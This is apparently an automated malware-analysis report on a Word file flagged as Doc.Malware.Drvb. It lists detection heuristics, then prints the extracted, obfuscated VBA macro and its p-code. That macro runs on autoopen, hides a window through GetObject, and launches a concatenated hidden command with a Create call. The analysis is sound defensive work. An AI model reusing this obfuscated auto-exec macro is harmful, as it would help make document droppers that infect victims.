MALICIOUS
190
Risk Score
Heuristics 7
-
ClamAV: Doc.Malware.Drvb-6901569-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Drvb-6901569-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set VkCAoD = GetObject(MDQAG_.iXXQQZGA) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10503 bytes |
SHA-256: 7decb3ee14e7e59737bb09972709c1a514ac368ac6efc398644e592aaa8f35e9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iAAAUxAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "MDQAG_"
Attribute VB_Base = "0{6A2F53B5-9796-4987-AFA1-C9468714A29A}{93C114CF-DDC9-4BDF-9D5C-225EE3E532C0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "ww_Ax_UU"
Sub autoopen()
On Error Resume Next
If TZQGXAQ = YAUokA_G Then
BkABXBA = 569984726 - ChrB(843076583 * Round(935502368) + iAAkDU - ChrB(D_BQUUAw)) / BAXXA1 / Rnd(469117493 / E14CA_A * SpBb / ChrW(50061209 * CBool(40066218) / 607781978 + CStr(oBA_Q1kk))) / 463721617 * Oct(TAAAxUwc)
End If
If PXcDDAAA = BBcAAB Then
joZZBA = 154354401 - ChrB(471567218 * Round(31201927) + HQC_GDo - ChrB(JQ4oGQQ)) / TUDwUx / Rnd(486658445 / RAC4wBkx * SpBb / ChrW(626150991 * CBool(62483571) / 112118660 + CStr(Oo1AAAAB))) / 321450386 * Oct(SAAAAACc)
End If
Set VkCAoD = GetObject(MDQAG_.iXXQQZGA)
If cAcADQ = zUwUAXA Then
wA4wAUBA = 453134110 - ChrB(140329015 * Round(871179875) + kDXQXAU - ChrB(iAAoBQAA)) / HD_AAA / Rnd(410789545 / UAUwDBc * SpBb / ChrW(129918205 * CBool(186648157) / 638284754 + CStr(QXAAACAB))) / 773641774 * Oct(S4D1A_A)
End If
If jZAUAw = CDcBZ4D_ Then
oZAwQQ = 856467553 - ChrB(496823596 * Round(490173833) + sAA1QBCx - ChrB(dGDoAkcc)) / p4GDkAAA / Rnd(792389568 / mAUX1XA * SpBb / ChrW(988484813 * CBool(39158236) / 120920582 + CStr(VwB_ABU))) / 870481188 * Oct(dAAAUXX)
End If
VkCAoD.ShowWindow = 64970 - 64970
If Xc_GAc = po1A4A Then
AXAUAA = 251164414 - ChrB(651805126 * Round(712340283) + wZAxxAD - ChrB(MoABAU4A)) / FBABAG / Rnd(255677085 / hAACQU * SpBb / ChrW(856406598 * CBool(528235425) / 51027830 + CStr(oQxZAk))) / 938647101 * Oct(SXX__U)
End If
If DAAAQZ_ = ACA1A_ Then
YACB4B = 629097278 - ChrB(712483311 * Round(804737756) + HAB4DAA - ChrB(jBAc_A4)) / qoAUA4A / Rnd(905399602 / DAAcAAQ * SpBb / ChrW(767340703 * CBool(187238390) / 336030284 + CStr(uUB_AACD))) / 302304842 * Oct(DcDAAXwC)
End If
If r4UAC_AZ = hDQXDAAU Then
JoZQAwG = 169749046 - ChrB(837101191 * Round(180256317) + sACAD4Q - ChrB(kU4AABD)) / PAxAAck / Rnd(911574048 / poGAAAQD * SpBb / ChrW(226780371 * CBool(552201874) / 66690612 + CStr(cA_AoAo))) / 382562619 * Oct(Zo_DAA)
End If
GetObject(MDQAG_.w4ZAQG_).Create% sAQUcQAA + MDQAG_.rAAwU1 + IQXBXA_B + MDQAG_.HACUDUC + aQAcoA + MDQAG_.IAAAGQAX + S_kUG4X, DQADAXw, VkCAoD, JAxQxA
If zAQxADBU = VQXZwAZ Then
AAACADU = 566589316 - ChrB(426537712 * Round(756681998) + MA41X41A - ChrB(z1oDAUAB)) / zQAAAX / Rnd(789471137 / pkCkUX * SpBb / ChrW(342247120 * CBool(592197169) / 220856248 + CStr(KDxAQ4D))) / 383850561 * Oct(NBBkBUUQ)
End If
If vBADoA = EAxAQAA Then
kAQDX1oo = 537583213 - ChrB(350008565 * Round(978413243) + lAQQA4 - ChrB(sc4UG1UU)) / ID4U_cQA / Rnd(259650783 / RAUxAQ * SpBb / ChrW(183434635 * CBool(712580351) / 5986436 + CStr(aoBXXcQx))) / 178995178 * Oct(UAAQADBc)
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/4edd39f9b12d45a1a3e37e967facea9d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/iAAAUxAU - 1106 bytes
' Macros/VBA/MDQAG_ - 1157 bytes
' Macros/VBA/ww_Ax_UU - 4742 bytes
' Line #0:
' FuncDefn (Sub ww_Ax_UU())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' Ld TZQGXAQ
' Eq
' IfBlock
' Line #3:
' LitDI4 0x46D6 0x21F9
' LitDI4 0x53E7 0x3240
' LitDI4 0xA220 0x37C2
' ArgsLd Round 0x0001
' Mul
' Ld BkABXBA
' Add
' Ld iAAkDU
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld D_BQUUAw
' Div
' LitDI4 0x2A35 0x1BF6
' Ld BAXXA1
' Div
' Ld SpBb
' Mul
' LitDI4 0xDF99 0x02FB
' LitDI4 0x5CAA 0x0263
' Coerce (Bool)
' Mul
' LitDI4 0x045A 0x243A
' Div
' Ld E14CA_A
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xD491 0x1BA3
' Div
' Ld oBA_Q1kk
' ArgsLd Oct 0x0001
' Mul
' Sub
' St YAUokA_G
' Line #4:
' EndIfBlock
' Line #5:
' Ld TAAAxUwc
' Ld PXcDDAAA
' Eq
' IfBlock
' Line #6:
' LitDI4 0x42E1 0x0933
' LitDI4 0x8B72 0x1C1B
' LitDI4 0x1A87 0x01DC
' ArgsLd Round 0x0001
' Mul
' Ld joZZBA
' Add
' Ld HQC_GDo
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld JQ4oGQQ
' Div
' LitDI4 0xD18D 0x1D01
' Ld TUDwUx
' Div
' Ld SpBb
' Mul
' LitDI4 0x4E4F 0x2552
' LitDI4 0x6C73 0x03B9
' Coerce (Bool)
' Mul
' LitDI4 0xCB84 0x06AE
' Div
' Ld RAC4wBkx
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xF192 0x1328
' Div
' Ld Oo1AAAAB
' ArgsLd Oct 0x0001
' Mul
' Sub
' St BBcAAB
' Line #7:
' EndIfBlock
' Line #8:
' SetStmt
' Ld MSForms
' MemLd GetObject
' ArgsLd VkCAoD 0x0001
' Set SAAAAACc
' Line #9:
' Ld iXXQQZGA
' Ld cAcADQ
' Eq
' IfBlock
' Line #10:
' LitDI4 0x471E 0x1B02
' LitDI4 0x4037 0x085D
' LitDI4 0x2663 0x33ED
' ArgsLd Round 0x0001
' Mul
' Ld wA4wAUBA
' Add
' Ld kDXQXAU
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld iAAoBQAA
' Div
' LitDI4 0x26A9 0x187C
' Ld HD_AAA
' Div
' Ld SpBb
' Mul
' LitDI4 0x64FD 0x07BE
' LitDI4 0x065D 0x0B20
' Coerce (Bool)
' Mul
' LitDI4 0x73D2 0x260B
' Div
' Ld UAUwDBc
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xD62E 0x2E1C
' Div
' Ld QXAAACAB
' ArgsLd Oct 0x0001
' Mul
' Sub
' St zUwUAXA
' Line #11:
' EndIfBlock
' Line #12:
' Ld S4D1A_A
' Ld jZAUAw
' Eq
' IfBlock
' Line #13:
' LitDI4 0xA861 0x330C
' LitDI4 0xED2C 0x1D9C
' LitDI4 0x7589 0x1D37
' ArgsLd Round 0x0001
' Mul
' Ld oZAwQQ
' Add
' Ld sAA1QBCx
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld dGDoAkcc
' Div
' LitDI4 0xE7C0 0x2F3A
' Ld p4GDkAAA
' Div
' Ld SpBb
' Mul
' LitDI4 0x14CD 0x3AEB
' LitDI4 0x81DC 0x0255
' Coerce (Bool)
' Mul
' LitDI4 0x1A06 0x0735
' Div
' Ld mAUX1XA
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x7D24 0x33E2
' Div
' Ld VwB_ABU
' ArgsLd Oct 0x0001
' Mul
' Sub
' St CDcBZ4D_
' Line #14:
' EndIfBlock
' Line #15:
' LitDI4 0xFDCA 0x0000
' LitDI4 0xFDCA 0x0000
' Sub
' Ld SAAAAACc
' MemSt dAAAUXX
' Line #16:
' Ld ShowWindow
' Ld Xc_GAc
' Eq
' IfBlock
' Line #17:
' LitDI4 0x76FE 0x0EF8
' LitDI4 0xC1C6 0x26D9
' LitDI4 0x733B 0x2A75
' ArgsLd Round 0x0001
' Mul
' Ld AXAUAA
' Add
' Ld wZAxxAD
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld MoABAU4A
' Div
' LitDI4 0x529D 0x0F3D
' Ld FBABAG
' Div
' Ld SpBb
' Mul
' LitDI4 0xBA46 0x330B
' LitDI4 0x3BA1 0x1F7C
' Coerce (Bool)
' Mul
' LitDI4 0x9F76 0x030A
' Div
' Ld hAACQU
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x9E3D 0x37F2
' Div
' Ld oQxZAk
' ArgsLd Oct 0x0001
' Mul
' Sub
' St po1A4A
' Line #18:
' EndIfBlock
' Line #19:
' Ld SXX__U
' Ld DAAAQZ_
' Eq
' IfBlock
' Line #20:
' LitDI4 0x433E 0x257F
' LitDI4 0xA1EF 0x2A77
' LitDI4 0x52DC 0x2FF7
' ArgsLd Round 0x0001
' Mul
' Ld YACB4B
' Add
' Ld HAB4DAA
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld jBAc_A4
' Div
' LitDI4 0x4D32 0x35F7
' Ld qoAUA4A
' Div
' Ld SpBb
' Mul
' LitDI4 0xB09F 0x2DBC
' LitDI4 0x07F6 0x0B29
' Coerce (Bool)
' Mul
' LitDI4 0x6A4C 0x1407
' Div
' Ld DAAcAAQ
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0xCE4A 0x1204
' Div
' Ld uUB_AACD
' ArgsLd Oct 0x0001
' Mul
' Sub
' St ACA1A_
' Line #21:
' EndIfBlock
' Line #22:
' Ld DcDAAXwC
' Ld r4UAC_AZ
' Eq
' IfBlock
' Line #23:
' LitDI4 0x2A36 0x0A1E
' LitDI4 0x2687 0x31E5
' LitDI4 0x7E3D 0x0ABE
' ArgsLd Round 0x0001
' Mul
' Ld JoZQAwG
' Add
' Ld sACAD4Q
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld kU4AABD
' Div
' LitDI4 0x8420 0x3655
' Ld PAxAAck
' Div
' Ld SpBb
' Mul
' LitDI4 0x64D3 0x0D84
' LitDI4 0xEE92 0x20E9
' Coerce (Bool)
' Mul
' LitDI4 0x9E34 0x03F9
' Div
' Ld poGAAAQD
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x713B 0x16CD
' Div
' Ld cA_AoAo
' ArgsLd Oct 0x0001
' Mul
' Sub
' St hDQXDAAU
' Line #24:
' EndIfBlock
' Line #25:
' Ld Create
' Ld MSForms
' MemLd sAQUcQAA
' Add
' Ld rAAwU1
' Add
' Ld MSForms
' MemLd IQXBXA_B
' Add
' Ld HACUDUC
' Add
' Ld MSForms
' MemLd aQAcoA
' Add
' Ld IAAAGQAX
' Add
' Ld S_kUG4X
' Ld SAAAAACc
' Ld DQADAXw
' Ld MSForms
' MemLd Zo_DAA
' ArgsLd VkCAoD 0x0001
' ArgsMemCall w4ZAQG_% 0x0004
' Line #26:
' Ld JAxQxA
' Ld zAQxADBU
' Eq
' IfBlock
' Line #27:
' LitDI4 0x7784 0x21C5
' LitDI4 0x72F0 0x196C
' LitDI4 0x0D0E 0x2D1A
' ArgsLd Round 0x0001
' Mul
' Ld AAACADU
' Add
' Ld MA41X41A
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld z1oDAUAB
' Div
' LitDI4 0x5FA1 0x2F0E
' Ld zQAAAX
' Div
' Ld SpBb
' Mul
' LitDI4 0x46D0 0x1466
' LitDI4 0x3631 0x234C
' Coerce (Bool)
' Mul
' LitDI4 0xFFB8 0x0D29
' Div
' Ld pkCkUX
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x1841 0x16E1
' Div
' Ld KDxAQ4D
' ArgsLd Oct 0x0001
' Mul
' Sub
' St VQXZwAZ
' Line #28:
' EndIfBlock
' Line #29:
' Ld NBBkBUUQ
' Ld vBADoA
' Eq
' IfBlock
' Line #30:
' LitDI4 0xDE6D 0x200A
' LitDI4 0xB4F5 0x14DC
' LitDI4 0x66BB 0x3A51
' ArgsLd Round 0x0001
' Mul
' Ld kAQDX1oo
' Add
' Ld lAQQA4
' ArgsLd ChrB 0x0001
' Sub
' ArgsLd ChrB 0x0001
' Ld sc4UG1UU
' Div
' LitDI4 0xF4DF 0x0F79
' Ld ID4U_cQA
' Div
' Ld SpBb
' Mul
' LitDI4 0xFD8B 0x0AEE
' LitDI4 0x1CFF 0x2A79
' Coerce (Bool)
' Mul
' LitDI4 0x5884 0x005B
' Div
' Ld RAUxAQ
' Coerce (Str)
' Add
' ArgsLd ChrW 0x0001
' Div
' ArgsLd Rnd 0x0001
' Div
' LitDI4 0x3FEA 0x0AAB
' Div
' Ld aoBXXcQx
' ArgsLd Oct 0x0001
' Mul
' Sub
' St EAxAQAA
' Line #31:
' EndIfBlock
' Line #32:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.